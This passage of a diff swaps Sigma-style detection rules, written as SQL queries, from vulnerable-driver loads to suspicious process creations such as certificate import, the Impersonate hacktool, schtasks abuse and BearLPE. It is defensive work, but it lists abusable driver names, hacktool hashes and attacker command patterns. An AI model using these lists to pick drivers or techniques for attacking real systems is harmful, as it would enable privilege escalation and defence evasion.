driver as reported in CVE-2022-3699 which can be used to escalate privileges", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.t1553.004" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "HackTool - Impersonate Execution", + "id": 
"cf0c254b-22f1-4b2b-8221-e137b3c0af94", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis", "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_hktl_impersonate.yml" }, { - "title": "PowerShell Scripts Run by a Services", - 
"id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Vulnerable Driver Load By Name", - "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects the load of known vulnerable drivers via their names only.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. 
So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ADV64DRV.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ALSysIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrAutoChkUpdDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv101.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrIbDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrOmgDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrRapidStartDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrSmartConnectDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_AMD64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_IA64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GLCKIO2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HOSTNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwRwDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\MsIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenLibSys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SysInfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VProEventMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WCPU.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WINIODrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp152.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswsnx.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandbox.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DBUtilDrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_RCIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneTechIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NalDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO64.sys' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\AsrDrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMEMx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIXP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIO64\\_W10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GVCIDrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NBIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NCHGBIOS2x64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PhlashNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\UCOREW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinFlash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtcBSv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2cIo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDRyzenMasterDriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LHA.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kEvP64.sys' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\BSMI.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TmComm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW32.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HpPortIox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDPowerProfiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CorsairLLAccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\RTCore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.Sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\IOMap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswVmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FairplayKD.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pgldqpoc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvnetbus.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mslo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcdsrvc\\_x64.pkms' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HWiNFO64A.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\gmer.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PCADRVX64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clfs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ActiveHealth.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CAM\\_V3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GameFire.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorReport.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SmartDashboard.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGauge.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGaugeX7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VideoNovaServerControllerService.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ellp\\_service.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hardwareproviders.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ohm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sensorsview32\\_64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\touchpointanalyticsclient.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CQg5Jf.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HCdRDh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NcDgDn.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vLTZ19.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": 
"driver_load_win_vuln_drivers_names.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "WinDivert Driver Load", - "id": "679085d5-f427-4484-9f58-1dc30a7c426d", - "status": "experimental", - "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "test", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.collection", - "attack.defense_evasion", - "attack.t1599.001", - "attack.t1557.001" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ - "Legitimate WinDivert driver usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR 
Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", + "title": "Net.exe Execution", + "id": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often 
used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of Net.exe, whether suspicious or benign.", + "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.discovery", + "attack.t1007", + "attack.t1049", + "attack.t1018", + "attack.t1135", + "attack.t1201", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1087.001", + "attack.t1087.002", + "attack.lateral_movement", + "attack.t1021.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% group%' ESCAPE '\\' OR CommandLine LIKE '% localgroup%' ESCAPE '\\' OR CommandLine LIKE '% user%' ESCAPE '\\' OR CommandLine LIKE '% view%' ESCAPE '\\' OR CommandLine LIKE '% share%' ESCAPE '\\' OR CommandLine LIKE '% accounts%' ESCAPE '\\' OR CommandLine LIKE '% stop %' 
ESCAPE '\\' OR CommandLine LIKE '% start%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_net_susp_execution.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" - ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Imphash IN 
